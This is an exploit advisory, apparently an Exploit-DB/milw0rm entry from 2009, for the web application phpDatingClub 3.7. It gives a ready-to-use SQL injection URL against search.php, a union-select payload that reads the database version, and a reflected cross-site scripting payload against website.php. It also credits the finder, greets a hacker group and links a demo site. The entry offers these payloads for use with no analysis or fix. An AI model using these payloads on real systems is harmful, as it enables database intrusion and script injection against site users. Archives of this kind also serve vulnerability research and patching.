phpDatingClub 3.7 - SQL Injection / Cross-Site Scripting Injection

EDB-ID:

8990




Platform:

PHP

Date:

2009-06-22


###################################################################
###################################################################
phpDatingClub v 3.7(ansubdepartments_id) SQL/XSS Injection Vulnerability    
Note: Algeria 2-0 Zambia
###################################################################
Founder : ThE g0bL!N
Home:WwW.Snakespc.CoM
More info:http://www.w2b.ru/webapp.php?cat=phpDatingClub
###################################################################
###################################################################
SQL Injection Vulnerability  
###################################################################
Exploit
###################################################################
Http://www.site.com/phpDatingClub/search.php?mode=day&sform%5Bday%5D=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
Xss
website.php?page=%3Cscript%3Ealert(0)%3C/script%3E
Demo
----
http://www.w2b.ru/demo/phpDatingClub/
######################################################################
Greeting : Super_Ctistal (My Master)  And all Muslims&algerian Hackers

# milw0rm.com [2009-06-22]